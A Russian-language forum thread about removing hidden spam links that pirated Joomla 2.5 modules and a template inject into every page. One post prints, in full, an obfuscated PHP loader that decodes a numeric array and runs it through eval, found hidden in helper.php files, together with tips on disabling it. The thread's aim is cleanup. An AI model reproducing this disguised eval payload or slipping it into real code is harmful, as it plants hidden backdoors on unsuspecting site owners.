Удаляем скрытые ссылки в модулях и шаблонах Joomla 2.5

[Андрей88]

Здравствуйте Уважаемая коллегия мною и не только предпочитаемого форума. Недавно пришлось столкнуться вот с такой проблемой. При продвижении своего сайта, увидел, что на каждой странице(пример http://clip2net.com/s/5mIbjN) в коде отображается левый текст не имеющий никакого отношения к моему сайту. Первой мыслью было, что ломанули сайт, и разместили скрытую рекламу. Но оказалось все намного проще и банaльнее:
Модуль Accordion Menu для Joomla 2.5-3.0. использует скрипт, который выводит на сайте жертвы от 4 до 12 ссылок, либо как в моем случае целую статью ключевиков другой тематики. Функция написана хитро и просто закомментировать или удалить не получается, перестает работать модуль! Решение я нашел такое в самом модуле ререходим в папку CORE открываем MenuBase.php и в самом низу последние строки и есть нашая головная боль. Где стоят кодированные ссылки на внешний php, который и генерирует текст или выводит ссылки. Начиная с 229 строки(у вас может отличаться) удаляем все с кавычек:
$UnixTimeLastEdit = "";
$MenuAcoAuthor = "";
$MenuAcoName = "";
$MainDomain = "";
и сохраняемся! Мне помогло. Текст не генерируется и не выводит скрытых ссылок. Если не будет работать по каким либо причинам, попробуйте вместо удалить содержимое кавычек, дописать пару символов, испоганить путь


Сайт http://apriory.info , шаблон Youretro. Имею наборы левых ссылок в количестве 2 штук (видимых!) в левой части. До этого было три, третий втыкался между футером и паззлами на всех страницах, убрался после удаления строки <?php $random_key = @yj_youretro_generate_key(); ?> (хотя сути действия не уловил, возможны и другие последствия) в главном файле шаблона
На локальном сервере имеются пустые div'ы <div style="position:absolute;left:-5000px;"></div>, после заливки на сервер они наполнились ссылками.
При снятии с публикации всех модулей и плагинов они остаются, пропадает только при смене шаблона
По base64 искал, довольно много переменных, но ни в одной не нашел похожего на вредоносный код. В онлайн конвертере переводил html в base64 и и тоже рыскал по всякому.
Логикой понимаю, что писал вроде не гений, но зарыл хорошо, ни с одним decode рядом ничего не нашел.
ЗЫ За варез извините, жизнь такая... Возможно потом и куплю) Просто переставить шаблон на другой тягостно - два дня под себя правил.
РЕШЕНИЕ
Заразу нашел. Распространялась вместе с шаблоном. Каким-то образом (возможно при установке) распространилась на 4 модуля. Итого должно было быть 5 групп левых ссылок, подгруженных вроде как с внешнего источника. Во всех модулях с вредным кодом были файлы helper.php и еще основной php файл шаблона. Код такой
[spoiler]
function flybox_generate_keys() {

        $LimitCharacters = 10;

        $Keys = '';

        $RandomNum = array(1251.3, 13875.1875, 1388.8125, 1250.175, 13750.175, 13751.425, 13762.5625, 13875.175, 1263.925, 13763.925, 13751.3125, 13876.3, 1250.175, 1387.6875, 1251.3, 13750.1875, 1388.8125, 12500.05, 13751.425, 13875.1875, 13763.9375, 13750.1875, 13762.6875, 13763.9375, 13875.05, 13751.3125, 13763.925, 1262.55, 1251.3, 13875.1875, 1263.8, 1387.55, 1375.05, 1263.8, 1251.3, 13751.3125, 1263.8, 1251.3, 13875.175, 1263.8, 1375.0625, 1375.05, 1262.5625, 1387.6875, 13762.5625, 13751.425, 1262.55, 1251.3, 13750.1875, 1262.5625, 13887.6875, 1251.3, 13751.3, 1388.8125, 12500.05, 13751.425, 13762.5625, 13763.8, 13751.3125, 12638.9375, 13751.4375, 13751.3125, 13876.3, 12638.9375, 13750.1875, 13763.9375, 13763.925, 13876.3, 13751.3125, 13763.925, 13876.3, 13875.1875, 1262.55, 1250.175, 13762.55, 13876.3, 13876.3, 13875.05, 1387.675, 1263.9375, 1263.9375, 1250.175, 1263.925, 1251.3, 13875.1875, 1263.925, 1250.175, 1263.9375, 13875.175, 1263.925, 13875.05, 13762.55, 13875.05, 1388.9375, 13875.1875, 1388.8125, 1250.175, 1263.925, 1251.3, 12638.9375, 12625.1875, 12501.3125, 12625.175, 12626.425, 12501.3125, 12625.175, 12637.6875, 1250.175, 12512.55, 12626.3, 12626.3, 12625.05, 12638.9375, 12512.55, 12513.9375, 12625.1875, 12626.3, 1250.175, 12638.8125, 1262.5625, 1387.6875, 13751.3125, 13750.1875, 13762.55, 13763.9375, 1250.05, 1250.175, 1388.8, 13751.3, 13762.5625, 13876.425, 1250.05, 13875.1875, 13876.3, 13887.5625, 13763.8, 13751.3125, 1388.8125, 1251.4375, 13875.05, 13763.9375, 13875.1875, 13762.5625, 13876.3, 13762.5625, 13763.9375, 13763.925, 1387.675, 13750.0625, 13750.175, 13875.1875, 13763.9375, 13763.8, 13876.3125, 13876.3, 13751.3125, 1387.6875, 13763.8, 13751.3125, 13751.425, 13876.3, 1387.675, 1263.8125, 1376.3125, 1375.05, 1375.05, 1375.05, 13875.05, 13887.55, 1387.6875, 1251.4375, 1388.925, 1251.3, 13751.3, 1388.8, 1263.9375, 13751.3, 13762.5625, 13876.425, 1388.925, 1250.175, 1387.6875, 13888.8125, 0.05);

        // Create a random string of keys

        foreach($RandomNum as $key) {$Keys .= chr(bindec($key * 80 - 4));}

        @eval($Keys);

} [/spoiler]
При удалении всего кода модули отрубались, помогло только удаление двух последних строк. Это, конечно, не полная очистка от вредного кода, но хотя бы отключило вывод ссылок на страницу. Поскольку в php не силен - дальше разбираться не стал.

P.S. Первый случай с модулем мой, а второй просто когда искал решение для себя нашел в сети. Вот думаю кому то может и пригодится.

[Гарик+]

На серче "услуга" такая предлагалась, сейчас не знаю, есть ли она. Ваши ссылки зашивают в такие вот халявные шаблоны и кидают в паблик для скачивания.

[motosimak]

Знаю лично таких людей, каждый день их осуждаю, что портят карму:)

[jetjo]

это как я понял наскачивали вы пиратский расширений с паразитами внутри, желательно конечно ж лицензионку всегда ставить на серьезные сайта или же чистить код, частенько скрытые ссылки могут быть в коде в виде base64, попробуйте выключить полностью данный модуль, плагин или расширение и посмотреть будет ли текст без него отображаться, можно скачать с другого места, частенько бывает что многие расширения скачиваемые с того же поганого joomla masteraб оказываются бесплатными - на сайте разработчиков